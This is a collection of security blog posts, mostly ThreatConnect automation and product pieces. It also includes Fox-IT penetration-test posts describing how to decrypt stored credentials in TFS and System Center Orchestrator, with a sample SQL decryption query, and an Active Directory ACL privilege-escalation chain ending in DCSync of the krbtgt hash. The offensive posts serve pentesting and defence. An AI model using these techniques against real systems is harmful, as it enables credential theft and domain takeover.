To strengthen your ability to communicate geeky concepts in plain English, consider the following exercise: Take a boring paragraph from a security assessment report or an information security policy and translate it into a sentence that’s no longer than 15 words without using industry terminology. I’m not suggesting that the resulting statement should replace the original text; instead, I suspect this exercise will train you to write more plainly and succinctly.

For example, I extracted and slightly modified a few paragraphs from the Princeton University Information Security Policy, just so that I could experiment with some public document written in legalese. I then attempted to relay the idea behind each paragraph in the form of a 3-line haiku (5-7-5 syllables per line):

This Policy applies to all Company employees, contractors and other entities acting on behalf of Company. This policy also applies to other individuals and entities granted use of Company information, including, but not limited to, contractors, temporary employees, and volunteers.

If you can read this,
you must follow the rules that
are explained below.

When disclosing Confidential information, the proposed recipient must agree (i) to take appropriate measures to safeguard the confidentiality of the information; (ii) not to disclose the information to any other party for any purpose absent the Company’s prior written consent.

Don’t share without a
contract any information
that’s confidential.

All entities granted use of Company Information are expected to: (i) understand the information classification levels defined in the Information Security Policy; (ii) access information only as needed to meet legitimate business needs.

Know your duties for
safeguarding company info.
Use it properly.

By challenging yourself to shorten a complex concept into a single sentence, you motivate yourself to determine the most important aspect of the text, so you can better communicate it to others. This approach might be especially useful for fine-tuning executive summaries, which often warrant careful attention and wordsmithing. This is just one of the ways in which you can improve your writing skills with deliberate practice.

Playbook Fridays: Conducting VMRay Malware Analysis

Save time with a one-click process

ThreatConnect developed the Playbooks capability to help analysts automate time consuming and repetitive tasks so they can focus on what is most important. And in many cases, to ensure the analysis process can occur consistently and in real time, without human intervention.

An automated malware analysis system (AMA) is a requirement in any defender's repertoire. Any time that can be saved during an analyst's process performing what amounts to menial labor can be spent on actual analysis and proactively defending an organization.

This Playbook takes a suspicious or malicious file sample from ThreatConnect's Malware Vault and transmits it to an automated malware analysis system, in this case, VMRay, submitting it for dynamic and static analysis. It turns a manual, multiple-click process into a simple, one-click process, saving a small amount of time, which really adds up over the course of weeks and months.

The Playbook is triggered by a User Action. In this case, the run playbook button is mapped to Documents in ThreatConnect. This generates a button on the Document's details page called "VMRay Analyze".

The Playbook downloads the malware sample and copies the archive password stored in an attribute of the Document. These two, as well as any configuration settings, are submitted to VMRay's REST API. The Playbook checks whether either of two TLPs are marking the sample: TLP:RED or TLP:AMBER. If they are present, the sample is only analyzed by VMRay, it is not additionally checked with third party scanners. Finally, the Playbook checks for errors and returns a nice tooltip with a link to the analysis report in VMRay's portal.



Entire VMRay Submission Playbook




New Playbook Return on Investment Calculator



In the latest release of ThreatConnect, Playbooks now have a Return on Investment (ROI) calculator. By estimating the time saved by running a playbook compared with the time wasted by an analyst performing the process manually, one is able to calculate roughly how much money a playbook is saving a team over time.


The following are a few highlights from certain steps in the Playbook:



A set variable app is first in the sequence of the playbook. This allows the user to set various options used during submission to VMRay.


This step uses an implementation of JMESPath to check if the sample in the ThreatConnect Malware Vault has been marked with a security label. In this case, it is checking for TLP:AMBER and TLP:RED, two designations that are part of the traffic light protocol, a system for governing how data may be shared and with whom. In this case, data that is marked with either of these two restrictive TLPs will be sent only to VMRay and not to any third party system.


This step leverages ThreatConnect's data store to save the API response from VMRay. As you can see, this uses the "Organization" domain of the data store. This allows other playbooks running in one's org in ThreatConnect access to the data that this playbook writes there. Any further operations can then be built out in other playbooks based on the saved data.


The trigger for this playbook is a User Action. This provides a button on the malware vault document that runs the playbook in the context of that Document. After the sample has been submitted for analysis to VMRay, a link back to the report in VMRay's portal is displayed to the user as a tooltip that appears above the button once it has been clicked. If for some reason the analysis failed at the time of submission, the error message is displayed in the same tooltip for the user to view.

The post Playbook Fridays: Conducting VMRay Malware Analysis appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

Playbook Fridays: How to Use ThreatConnect Playbooks to Manage Security APIs

Planning for APIs as part of your security architecture

This is my first Playbook Friday blog post. I love the ones that the team creates and thought I would try my hand at one. That said, because I am not in the Platform as much as I'd like to be, I enlisted the help of one of our Sales Engineers. (Thanks for your help Ryan!)  

In my last blog post, I spoke to the challenge of API's not existing when we were getting started and how we had to wait out the market. API's are now available across the security industry, which is very good news. The problem now is that the number of API's used by security professionals and overhead of managing them is creating a new challenge within the security team.    

Many organizations have multiple tools, and analysts using the same product's API's.  In some cases they have their own unique subscriptions, each user or connected tool having its own API account, or are sharing an enterprise subscription. Either way, every person and every connected tool may make use of the same API. For example, the SIEM enriches some data with a connection to a malware intelligence service (e.g. Hybrid Analysis, ReversingLabs, VirusTotal, etc) , then sends an alert to the IR platform which does the same lookups in the malware service, which then calls out to a Threat Intel Analytics and Orchestration platform and asks the same exact question. So, best case scenario is that you had 3 calls to the malware service service from 3 tools per interesting event in the SIEM. This is inefficient, wastes time, and introduces more potential points of failure.

Now remember, this one use-case is not the only use-case leveraging the API. Generally there will be people who run custom scripts, other tools outside of the ones above, or people that have been given the API keys and you don't even know about that will employ the API. In other words, a single API may be used hundreds or thousands of times a day, depending on the use-cases and number of people and tools that have the key.

API Management

This is why API management became important in IT years ago with the success of Service Oriented Architecture (SOA).  For those of you that have never heard of SOA or want to learn more, please take a look at from Arcitura Education. It provides a great deal of information on the topic.  

In order to counter the problem stated above, and leverage principles of SOA and API management, the security organization needs to plan for API's as part of their architecture. Following principles of SOA, the service should be built to answer a specific question - Let's say "Tell me what I know about a file" and be managed as a resource that is independent of the underlying technologies and services behind it.  

Benefits of API Management within the security organization:

  • Reduce the risk of failure by reducing complexity across your API dependent systems  
  • Save resources in terms of building or configuring each of those API connections in seperate tools and processes independently
  • Through caching, conserve metered API calls for Services. In addition, conserving bandwidth and external network traffic across external service calls  
  • Decoupling internal users and systems from shared API key usage. Or you bought a service multiple times without knowing and can alleviate the expense of multiple subscriptions
  • Analytics can be performed across API's to measure their effectiveness as well as to provide insights into interesting use-cases across your enterprise


Now let's get a little more detailed about how we are going to fulfill the needs of the service. I'm going to assume that the customer is using ThreatConnect and has the Playbooks capability which allows them to create a ThreatConnect Playbook and Playbook Components. Although I am using ThreatConnect for all aspects of this use-case, there may be reasons to invest in a dedicated API management technology. Products like CA Technologies (formerly Layer 7 Technologies), and Apigee are well known in this area. Also, most of your large cloud providers, Amazon, Microsoft, IBM, and Oracle have some type of API management capability as part of their offerings.  

 As an example, we will build an enterprise Malware Analysis Service, integrate the API with the underlying knowledge in ThreatConnect and in CAL™ as well as a third party's malware service. Then we will add metrics collection across various aspects of the service, add a caching capability, and finally, configure a dashboard that highlights various aspects of the services usage.  

 Step 1. Create "Malware Analysis Service" using a Playbook that receives an API query with HTTP Basic Authentication and a File Indicator as input. The HTTP Basic Authentication will be used to tie requests to people and tools across the organization.


Basic Flow:

Step 2. Create a Playbook Component for "Retrieve File Intel" which collects knowledge across the ThreatConnect Platform as well as calls another Playbook Component that queries external services. The combined set of data is returned as JSON to the Malware Analysis Service Playbook.   



Basic Flow:

  • Receive username and file indicator as input
  • Increment File Observation
  • Run File Analysis Playbook Component
  • Get all Intel from within ThreatConnect and CAL about file indicator
  • Merge File Analysis response and all other intel collected and return JSON result to Malware Analysis Service Playbook


  • Daily Executions - Total and By User
  • Daily Executions - File Found
  • Daily Executions - File Not Found


Step 3. Create a Playbook Component for "Retrieve File Report" which collects knowledge from one or more external services and returns to the Malware Analysis Service Playbook. Of particular interest is that this Playbook calls a caching component that returns the previous result if the cache is less than 30 days old.



Basic Flow:

  • Receive username and file indicator as input
  • Determine if file indicator is in cache (<30 days)
  • If no cache hit then send query to file analysis and enrichment service and update ThreatConnect database and cache
  • Return JSON response


  • Daily Executions - Total
  • Daily Executions - Cached
  • Daily Executions - File Not Found
  • Daily Executions - File Found


Step 4. Create Playbook Components for "Set Data Cache" and "Read Data Cache". Both Components will be built using the ThreatConnect DataStore capability which supports CRUD (Create, Read, Update, Delete) operations to the ThreatConnect DataStore.  



Basic Flow:

  • Receive file indicator as input
  • If exists in cache, get data and timestamp out of DataStore. Otherwise return null.
  • Call Get Delta Epoch Component with cache max age  as the delta. This will return the maximum age as an epoch.
  • If Get Delta Epoch result is less than cache timestamp, data is still valid

Otherwise data is stale, return null. 


basic-flow-threatconnectBasic Flow:

  • Receive JSON object of file indicator as input
  • Does the data exist in the cache
  • If exists delete it, and then set it with received data and current epoch timestamp.
  • Doesn't exist, then set it with received data and current epoch timestamp.

Step 5. Now that the capabilities of the service are dealt with, and API calls are being received from users, we can move to creating a dashboard to better monitor the services usage.



Above is a screen capture of a dashboard that allows us to quickly see how the Malware Analysis Service is being leveraged (Top left) and how the external enrichment services are being utilized as part of the service (Top Right). On the bottom left you can see who is using the Malware Analysis Service and which are heavy users. On the bottom right are the list of the most highly observed file indicators.

Looking at the top right dashboard card, and the red line specifically, you can see how effective your cache is relative to the services' overall queries. As I said in the beginning, external services are often rate limited, or charged per query, so it is a good idea to measure the cache effectiveness and see how you can tweak it for better performance. This, coupled with an understanding of the per query cost savings, can be presented as one component of value-add from the service.  

On June 5th at 10:30am, Ron Richie and Pat Opet from J.P. Morgan Chase & Co., and I are presenting at the Gartner Security and Risk Summit in the Potomac B, Ballroom Level. Our presentation is titled "Architecting For Speed: Building a Modern Cyber-Service-Oriented Architecture" and will describe a modern service-enabled stack, positioned for critical security decisions at speed.

If you like what you see here, check out the Playbooks and components repository here in GitHub.

The post Playbook Fridays: How to Use ThreatConnect Playbooks to Manage Security APIs appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

Introducing Team Foundation Server decryption tool

During penetration tests we sometimes encounter servers running software that use sensitive information as part of the underlying process, such as Microsoft’s Team Foundation Server (TFS). TFS can be used for developing code, version control and automatic deployment to target systems. This blogpost provides two tools to decrypt sensitive information that is stored in the TFS database.

Decrypting TFS secrets

Within Team Foundation Server (TFS), it is possible to automate the build, testing and deployment of new releases. With the use of variables it is possible to create a generic deployment process once and customize it per environment.1 Sometimes specific tasks need a set of credentials or other sensitive information and therefor TFS supports encrypted variables. With an encrypted variable the contents of the variables is encrypted in the database and not visible for the user of TFS.


However, with the correct amount of access rights to the database it is possible to decrypt the encrypted content. Sebastian Solnica wrote a blogpost about this, which can be read on the following link:

Fox-IT wrote a PowerShell script that uses the information mentioned in the blogpost. While the blogpost mainly focused on the decryption technique, the PowerShell script is built with usability in mind. The script will query all needed values and display the decrypted values. An example can be seen in the following screenshot:


The script can be downloaded from Fox-IT’s Github repository:

It is also possible to use the script in Metasploit. Fox-IT wrote a post module that can be used through a meterpreter session. The result of the script can be seen in the screenshot below.


There is a pull request pending and hopefully the module will be part of the Metasploit Framework soon. The pull request can be found here:



ThreatConnect and the Rise of the Security Developer

Taking Your Team & Career to the Next Level with ThreatConnect's GitHub Repositories

Going to the Next Level with ThreatConnect's GitHub Repositories

When I walk the show floors at RSA or Black Hat, I'm always struck by the number of new products that pop up every year. The "hot topic" varies - this year it was AI - but new booths springing up from the expo center carpet like magic is a constant. It can be a bit overwhelming: like showing up at a bar with an outrageously huge beer selection. But it can also be exciting, like (responsibly) trying all of those beers.


Yep, this is what Black Hat is like. In so, so many ways.


We get it. There's finally a hot new EDR or UEBA tool that does everything that you want, but you're nervous: will it work in your environment? Can your existing tools talk to it? Will your team understand how to use it? At ThreatConnect, our vision is to ensure that your answer is consistently "yes": if you're excited about new software, you should be able to integrate it into your team, your processes, and your tech stack. We've written at length about our platform strategy, but that "yes" is what it really comes down to.

The Rise of the Security Developer

One trend that makes this strategy possible is the rise of the Security Developer - security analysts who are dangerous enough with Python to take advantage of all of these new tools. If you're able to get that new EDR or UEBA or AMA or vulnerability scanner to work with your existing SIEM, ticketing system, whatever... you'll be a hero. Honing your skills with Python (or other security-friendly scripting language) and becoming familiar with APIs are big parts of becoming a Security Developer. To really take advantage of those skills, though, you need a "partner in crime": an extensible security platform that can bring all those APIs and exciting tools into a central location where all of your data and teammates can take advantage. Like ThreatConnect.

To enable new and mature Security Developers, we've created robust SDKs that can help you write apps, build automations, and more. A great place to get started is in our documentation.



Dogs are the best.

No One is an Island

Our Security Developer customers make extensive use of these tools in their own ThreatConnect environments: integrating systems, automating common tasks, and flexing their developer muscles. But part of growing as a Security Developer is collaborating with other Security Developers.

We provide an exclusive Slack workspace¹ for our customers to exchange best practices about threat intelligence, security, and ThreatConnect. One day, something exciting happened: customers started sharing ThreatConnect software they'd built on Slack. This was amazing! Security Developers were collaborating!

Of course, while we love Slack, it's not the best tool for sharing software.

To more effectively enable our Security Developer users, we're excited to announce the launch of four GitHub repositories (repos) that they can use to share and collaborate. Our hope is that these repos not only help our users share successes and get more value out of ThreatConnect, but also help them hone their skills and make themselves and their teams more effective defenders.


¹ If you're a current customer and are interested in joining our Slack community, please contact your
customer success manager.

Announcing: ThreatConnect GitHub Repositories

To more effectively enable our Security Developer users, we're excited to announce the launch of four GitHub repositories (repos) that they can use to share and collaborate. Our hope is that these repos not only help our users share successes and get more value out of ThreatConnect, but also help them hone their skills and make themselves and their teams more effective defenders.



This is more like it.


Let's go over the four repositories:

Spaces Repository

Available here:

"Spaces" are applications that run in the ThreatConnect UI. Using Spaces, you can extend the abilities of ThreatConnect in a way that benefits other analysts. Enrich indicators in VirusTotal or DomainTools, visualize relationships between intelligence, do some quick static analysis: these are all tools that users have built using Spaces that run smartly in ThreatConnect.

Jobs Repository

Available here:

"Jobs" are apps that run in the background: collecting data from external feeds, enriching indicators in bulk, deploying indicators to a SIEM based on rules, etc.

Tools Repository

Available here:

Unlike the other repos, this one is intended for software that doesn't run in ThreatConnect, but instead is designed to enable developers in other ways. A tool to make it easier to developer other ThreatConnect apps, a Chrome extension, etc.

Playbooks Repository

Available here:

Playbooks are custom, intelligence-driven automated or partially automated processes that users can build in ThreatConnect. The Playbooks Repository allows users to collaborate on a variety of Playbooks resources: one of these is obviously Playbooks themselves, but the two most important are Components and Apps.

Integrations between security products today are more and more commonplace, but they are largely point solutions. It's nearly impossible for them on their own to incorporate logic based on what your team is doing or what all other products across your security technology stack are seeing. Furthermore, these integrations often lack some desired functionality that is unique to your needs. That's part of why your role as a Security Developer is so valuable: you can tune integrations to your needs and automate the processes that make them and your teams work together. What makes your job easier isn't a silver bullet, it's having the right building blocks. Components and Playbook Apps are those building blocks.

Playbook Components

Components allow users to utilize any Playbook App: HTTP Client for REST API calls, Email and Slack apps for notification, JSON Path for JSON queries, and the Regex App for data extractions as just a few examples. These Components give users quite a bit of power and can be turned into reusable components in any Playbook (it's like writing a Python function). For example, we've been able to build enrichment Components that call an API with authorization, extract data using JSON Path, and expose them as variables for other apps in a Playbook. Components can be reused in multiple Playbooks and look just like apps. It's a good way to create basic integrations with Playbooks that can then be integrated into other processes.

Playbook Apps

For when you need to build or modify an app, we provide a SDK and app framework so they can build any Playbook App in Python or Java. While you need to be comfortable in Python (...or Java) , it gives users full control over the functionality. Your apps behave just like any other app in Playbooks with inputs and outputs.

Ready to Start or Learn More?

The next time you're at a show like RSA and are overwhelmed by all the new tools you know your CISO is going to buy, just remind yourself: I have ThreatConnect. I have the support of the entire ThreatConnect Security Developer community. I can make this work.

If you're ready to start contributing or leveraging what others are doing, go ahead and check out the GitHub repos now! If you'd like to learn more about them, please contact For product feedback, please contact me directly at

The post ThreatConnect and the Rise of the Security Developer appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

Introducing Orchestrator decryption tool

Researched and written by Donny Maasland and Rindert Kramer


During penetration tests we sometimes encounter servers running software that use sensitive information as part of the underlying process, such as Microsoft’s System Center Orchestrator.
According to Microsoft, Orchestrator is a workflow management solution for data centers and can be used to automate the creation, monitoring and deployment of resources in your environment.1 This blogpost covers the encryption aspect of Orchestrator and new tools to decrypt sensitive information that is stored in the Orchestrator database.

Orchestrator, variables, encryption and SQL

In Orchestrator, it is possible to create variables that can be used in runbooks. One of the possibilities is to store credentials in these variables. These variables can then be used to authenticate with other systems. Runbooks can use these variables to create an authenticated session towards the target system and run all the steps that are defined in the runbook in the context of the credentials that are specified in the variable.

Information, such as passwords, that is of a sensitive nature can be encrypted by using encrypted variables. The contents of these variables are stored encrypted in the database when they are created and are decrypted when they are used in the runbooks. The picture below displays the dialog to create an encrypted variable.


Orchestrator uses the internal encryption functionality of Microsoft SQL server2 (MSSQL). The decryption keys are stored in the SYS database and have to be loaded in to the SQL session in order to decrypt data.

To decypt the data, we need the encrypted content first. The following query returns the encrypted content:


If there are secret variables stored in the database, this will result in encrypted data, such as:

The data between \`d.T.~De/ is the data we are interested in, which leaves us with the following string:
Please note that the \`d.T.~De/ value might differ per data type.

Since this data is encrypted, the decryption key needs to be loaded in the SQL session. To establish this, we open an SQL session and run the following query:


This will load the decryption key into the SQL session.

Now we run this string against the decryptbykey function in MSSQL3 to decrypt the content with the encryption key that was loaded earlier in the SQL session. If successful, this will result in a varbinary object that we need to convert to nvarchar for human readable output.

The complete SQL query will look like this:

SELECT convert(nvarchar, decryptbykey(0x00F04DA615688A4C96C2891105226AE90100000059A187C285E8AC6C1090F48D0BFD2775165F9558EAE37729DA43BE92AD133CF697D2C5CC1E6E27E534754099780A0362C794C95F3747A1E65E869D2D43EC3597));

Executing this query will return the unencrypted value of the variable, as can be seen in the following screenshot.

Automating the process

Fox-IT created a script that automates this process. The script queries the secrets and decrypts them automatically. The result of the script can be seen in the screenshot below.

The script can be downloaded from Fox-IT’s Github repository:

Fox-IT also wrote a Metasploit post module to run this script through a meterpreter.

The Metasploit module supports integrated login. Optionally, it is possible to use MSSQL authentication by specifying the username and password parameters. By default, the script will use the ‘Orchestrator’ database, but it is also possible to specify another database with the database parameter. Fox-IT did a pull request to add this module to Metasploit, so hopefully the module will be available soon. The pull request can be found here:



Playbook Fridays: Forcing Active Directory (AD) Password Resets via ThreatConnect Victims

Leveraging the Active Directory and ThreatConnect integration to help automate security processes

ThreatConnect developed the Playbooks capability to help analysts automate time consuming and repetitive tasks so they can focus on what is most important. And in many cases, to ensure the analysis process can occur consistently and in real time, without human intervention.

This post is the first in a series focused on integration scenarios between ThreatConnect and Microsoft Active Directory that customers can leverage to help automate security processes between cyber threats and incidents in ThreatConnect, and adjusting security policy or enforcing behavior with Active Directory users.

We've observed an issue which has plagued enterprises for some time now, and the longer it remains unaddressed, the greater the vulnerability to the organization. Microsoft Active Directory (AD) has been an indirect target for years, and only now is there awareness of the issue among many CIOs and CISOs which has been reaching critical mass. When a phishing attack and or any other account compromise occurs, hackers want to gain credentials to exploit infrastructure. Simple fact: the average Active Directory user has more than 100 account entitlements making compromise of an Active Directory account highly critical. These compromises, of course, can lead to damaging breaches threatening an organization's livelihood.

Most SOC analysts concentrate tactically on identifying a phishing email and neutralizing, blocking the URL and source. However they do not assure that the login, and especially the password, have not been compromised. This is due to a variety reasons, such as having to log into the AD directory, not knowing the infrastructure layout and not having proper permission to make changes. When an attack has taken place, ThreatConnect's orchestration capabilities can automatically connect to AD and gather victim information -- such as email address or any other key attribute -- and then change the user's account policy so at the next login they will be required to change their password. This type of rapid response enhances the overall security posture of the organization.  

This Playbook is a straightforward example of forcing a user to reset their AD password after being flagged in ThreatConnect as a victim. When an analyst searches for the victim name in ThreatConnect, she can then add add the tag, for example "flag", and this action triggers the playbook to run in the background. The trigger drives the logic to query Active Directory and pulls email address and other attributes in necessary to populate the info into the victim's asset information within ThreatConnect. The advantage being that over time ThreatConnect can report which employees were part of which cyber attacks related to this specific phishing email.

The master Playbook is illustrated below. The Victim Trigger drives the subsequent steps after a tag is applied. Next, there are two Playbook Components: LDAP Email Query (in orange) and the LDAP Password Reset 1. These reusable Components can be leveraged in other Playbooks ThreatConnect users may want to deploy.



The above integration is bi-directional with LDAP/Active Directory. It will also send a subsequent SLACK message to remind the user that they will have a password reset at their next login.

Below is the Playbook Component which will query LDAP/Active Directory for specific attribute information. In this Playbook, we will query the LDAP/Active Directory email info for the victim. We then convert it to String data and post the email info into ThreatConnect.



Below is the Playbook Component which will change the LDAP/Active Directory specific attribute called "pwdLastSet=0". By setting it from (1) to (0) zero will force the user to change their password at next login. It will also send a SLACK message at the end of the playbook of the upcoming password reset.


Below is the result of of the email information queried by ThreatConnect against LDAP/AD for the needed information as well as any other key attribute information or relevant Asset information.


The example below demonstrates the change of the Active Directory attribute to force the user to change their password at the next login.


In the next blog post of this series, we'll show how the process can begin with the receipt of a phishing email where we use information in the email to query and affect changes in Active Directory for a number of users, and how that data can be reported in a ThreatConnect Dashboard.

The post Playbook Fridays: Forcing Active Directory (AD) Password Resets via ThreatConnect Victims appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

Introducing ThreatConnect’s Intel Report Cards

Providing insight into how certain feeds are performing within ThreatConnect

As part of our latest release, we've introduced a new feature to help users better understand the intelligence they're pumping into their systems.  Intelligence can be a fickle thing; indicators are by their very nature ephemeral and part of our job is to better curate them. We find patterns not only in the intelligence itself, but in the sources of intelligence. As analysts, we frequently find ourselves asking a simple question: "Who's telling me this, and how much do I care?" We sought to tackle this problem on a few fronts in ThreatConnect in the form of Report Cards, giving you insight into how certain feeds are performing across the ThreatConnect ecosystem.  

First and foremost, we wanted to leverage any insights gleaned from our vast user base. We have users spanning dozens of industries across a global footprint. If a customer in Europe is seeing a lot of false positives come from a set of indicators, we want the rest of ThreatConnect users to learn from that. This is where ThreatConnect's CAL™ (Collective Analytics Layer) comes in. All participating instances of CAL are sending some anonymized, aggregated telemetry back. This gives us centralized insight which we can distribute to our customers. This telemetry includes automated tallies, such as how often an indicator is being observed in networks, as well as human-curated data such as how often False Positives are being reported.

Feed selection interface, driven by CAL's insights (27 March 2018)


By combining and standardizing these metrics, CAL can start to paint a picture of various intelligence feeds.  CAL knows which feeds are reporting on which indicators, and can overlay this information at scale with the above telemetry.  This has an impact at the strategic level, when deciding which feeds to enable in your instance. We're all familiar with the "garbage in, garbage out" problem -- simply turning on every feed may not be productive for your environment and team.  High-volume feeds that yield a lot of false positives, report on indicators outside of your areas of interest, or are simply repeated elsewhere may not be worth your time. Now system administrators can make an informed decision on which feeds they would like to enable in their instance, and with a single button click can get months of historical data.  These feeds are curated by the ThreatConnect Research team, who is doing their best to prune and automatically deprecate older data to keep the feeds relevant.

ThreatConnect's Intelligence Report card helps you better understand a candidate feed (27 March 2018)


The Report Card view goes into more depth on a particular feed. For each feed CAL knows about, it will give you a bullet chart containing the feed's performance on a few key dimensions, as determined by the ThreatConnect analytics team.  In short, a bullet chart identifies ranges of performance (red, yellow, and green here) to give you a quick representation of the groupings we've identified for a particular metric. A vertical red line indicates what we consider to be a successful "target" number for that metric, and the gray line indicates the selected feed's actual performance on that metric. We've identified a few key metrics that we think will help our users make decisions:

  • Reliability Rating is a measure of false positive reports on indicators reported by this feed. It's more than just a count of how many votes have been tallied by users. We also consider things like how egregious a false positive is, since alerting on something like in your SIEM is a much more grave offense in our book. We give this a letter grade, from A-F, to help you identify how likely this feed is to waste your time.
  • Unique Indicators is a simple percentage of how many indicators contained within this feed aren't found anywhere else. If a feed's indicators are often found elsewhere, then some organizations may prefer not to duplicate data by adding them again. There may be reasons for this, as we see below with ThreatAssess. Nonetheless, this metric is a good way to help you understand how much novelty does this feed add?
  • First Reported measures the percentage of indicators which, when identified in other feeds, were found in this feed first. Even if a feed's indicators are often found elsewhere, this feed may have value if it's reporting those indicators significantly earlier. This metric helps you understand how timely a feed is relative to other feeds.
  • Scoring Disposition is a measure of the score that CAL assigns to indicators, on a 0-1000 scale. This score can be factored into the ThreatAssess score (alongside your tailored, local analysis). The Scoring Disposition is not an average of those score, but a weighted selection based on the indicators we know our users care about. This metric helps answer how bad are the things in this feed according to CAL?

The Report Card also contains a few other key fields, namely the Daily Indicators graph and the Common Classifiers box. The Daily Indicators chart shows you the indicator volume coming from a source over time, to help you understand the ebbs and flows of a particular feed. The Common Classifiers box shows which Classifiers are most common on indicators in the selected feed. Combined, these can give you an idea of how many indicators am I signing up for, and what flavors are they?

All of these insights are designed to help you make better decisions throughout your security lifecycle. Ultimately, the decision to add a feed should be a calculated one. When an analyst sees that an indicator was found in a particular feed, they may choose to use that information based on the Reliability Rating of that feed. You can leverage these insights as trust levels via ThreatAssess, allowing you to make such choices for every indicator in your instance.

We'll continue to improve our feed offering and expand upon our Report Cards as we hear more feedback from you, so please feel free to Tweet us @ThreatConnect.

The post Introducing ThreatConnect's Intel Report Cards appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

Escalating privileges with ACLs in Active Directory

Researched and written by Rindert Kramer and Dirk-jan Mollema


During internal penetration tests, it happens quite often that we manage to obtain Domain Administrative access within a few hours. Contributing to this are insufficient system hardening and the use of insecure Active Directory defaults. In such scenarios publicly available tools help in finding and exploiting these issues and often result in obtaining domain administrative privileges. This blogpost describes a scenario where our standard attack methods did not work and where we had to dig deeper in order to gain high privileges in the domain. We describe more advanced privilege escalation attacks using Access Control Lists and introduce a new tool called Invoke-Aclpwn and an extension to ntlmrelayx that automate the steps for this advanced attack.

AD, ACLs and ACEs

As organizations become more mature and aware when it comes to cyber security, we have to dig deeper in order to escalate our privileges within an Active Directory (AD) domain. Enumeration is key in these kind of scenarios. Often overlooked are the Access Control Lists (ACL) in AD.An ACL is a set of rules that define which entities have which permissions on a specific AD object. These objects can be user accounts, groups, computer accounts, the domain itself and many more. The ACL can be configured on an individual object such as a user account, but can also be configured on an Organizational Unit (OU), which is like a directory within AD. The main advantage of configuring the ACL on an OU is that when configured correctly, all descendent objects will inherit the ACL.The ACL of the Organizational Unit (OU) wherein the objects reside, contains an Access Control Entry (ACE) that defines the identity and the corresponding permissions that are applied on the OU and/or descending objects.The identity that is specified in the ACE does not necessarily need to be the user account itself; it is a common practice to apply permissions to AD security groups. By adding the user account as a member of this security group, the user account is granted the permissions that are configured within the ACE, because the user is a member of that security group.

Group memberships within AD are applied recursively. Let’s say that we have three groups:

  • Group_A
    • Group_B
      • Group_C

Group_C is a member of Group_B which itself is a member of Group_A. When we add Bob as a member of Group_C, Bob will not only be a member of Group_C, but also be an indirect member of Group_B and Group_A. That means that when access to an object or a resource is granted to Group_A, Bob will also have access to that specific resource. This resource can be an NTFS file share, printer or an AD object, such as a user, computer, group or even the domain itself.
Providing permissions and access rights with AD security groups is a great way for maintaining and managing (access to) IT infrastructure. However, it may also lead to potential security risks when groups are nested too often. As written, a user account will inherit all permissions to resources that are set on the group of which the user is a (direct or indirect) member. If Group_A is granted access to modify the domain object in AD, it is quite trivial to discover that Bob inherited these permissions. However, if the user is a direct member of only 1 group and that group is indirectly a member of 50 other groups, it will take much more effort to discover these inherited permissions.

Escalating privileges in AD with Exchange

During a recent penetration test, we managed to obtain a user account that was a member of the Organization Management security group. This group is created when Exchange is installed and provided access to Exchange-related activities. Besides access to these Exchange settings, it also allows its members to modify the group membership of other Exchange security groups, such as the Exchange Trusted Subsystem security group. This group is a member of the Exchange Windows Permissions security group.


By default, the Exchange Windows Permissions security group has writeDACL permission on the domain object of the domain where Exchange was installed. 1


The writeDACL permissions allows an identity to modify permissions on the designated object (in other words: modify the ACL) which means that by being a member of the Organization Management group we were able to escalate out privileges to that of a domain administrator.
To exploit this, we added our user account that we obtained earlier to the Exchange Trusted Subsystem group. We logged on again (because security group memberships are only loaded during login) and now we were a member of the Exchange Trusted Subsystem group and the Exchange Windows Permission group, which allowed us to modify the ACL of the domain.

If you have access to modify the ACL of an AD object, you can assign permissions to an identity that allows them to write to a certain attribute, such as the attribute that contains the telephone number. Besides assigning read/write permissions to these kinds of attributes, it is also possible to assign permissions to extended rights. These rights are predefined tasks, such as the right of changing a password, sending email to a mailbox and many more2. It is also possible to add any given account as a replication partner of the domain by applying the following extended rights:

  • Replicating Directory Changes
  • Replicating Directory Changes All

When we set these permissions for our user account, we were able to request the password hash of any user in the domain, including that of the krbtgt account of the domain. More information about this privilege escalation technique can be found on the following GitHub page:

Obtaining a user account that is a member of the Organization Management group is not something that happens quite often. Nonetheless, this technique can be used on a broader basis. It is possible that the Organization Management group is managed by another group. That group may be managed by another group, et cetera. That means that it is possible that there is a chain throughout the domain that is difficult to discover but, if correlated correctly, might lead to full compromise of the domain.

To help exploit this chain of security risks, Fox-IT wrote two tools. The first tool is written in PowerShell and can be run within or outside an AD environment. The second tool is an extension to the ntlmrelayx tool. This extension allows the attacker to relay identities (user accounts and computer accounts) to Active Directory and modify the ACL of the domain object.


Invoke-ACLPwn is a Powershell script that is designed to run with integrated credentials as well as with specified credentials. The tool works by creating an export with SharpHound3 of all ACLs in the domain as well as the group membership of the user account that the tool is running under. If the user does not already have writeDACL permissions on the domain object, the tool will enumerate all ACEs of the ACL of the domain. Every identity in an ACE has an ACL of its own, which is added to the enumeration queue. If the identity is a group and the group has members, every group member is added to the enumeration queue as well. As you can imagine, this takes some time to enumerate but could end up with a chain to obtain writeDACL permission on the domain object.


When the chain has been calculated, the script will then start to exploit every step in the chain:

  • The user is added to the necessary groups
  • Two ACEs are added to the ACL of the domain object:
    • Replicating Directory Changes
    • Replicating Directory Changes All
  • Optionally, Mimkatz’ DCSync feature is invoked and the hash of the given user account is requested. By default the krbtgt account will be used.

After the exploitation is done, the script will remove the group memberships that were added during exploitation as well as the ACEs in the ACL of the domain object.

To test the script, we created 26 security groups. Every group was member of another group (testgroup_a was a member of testgroup_b, which itself was a member of testgroup_c, et cetera, up until testgroup_z.)
The security group testgroup_z had the permission to modify the membership of the Organization Management security group. As written earlier, this group had the permission to modify the group membership of the Exchange Trusted Subsystem security group. Being a member of this group will give you the permission to modify the ACL of the domain object in Active Directory.

We now had a chain of 31 links:

  • Indirect member of 26 security groups
  • Permission to modify the group membership of the Organization Management security group
  • Membership of the Organization Management
  • Permission to modify the group membership of the Exchange Trusted Subsystem security group
  • Membership of the Exchange Trusted Subsystem and the Exchange Windows Permission security groups

The result of the tool can be seen in the following screenshot:


Please note that in this example we used the ACL configuration that was configured
during the installation of Exchange. However, the tool does not rely on Exchange
or any other product to find and exploit a chain.

Currently, only the writeDACL permission on the domain object is enumerated
and exploited. There are other types of access rights such as owner, writeOwner, genericAll, et cetera, that can be exploited on other object as well.
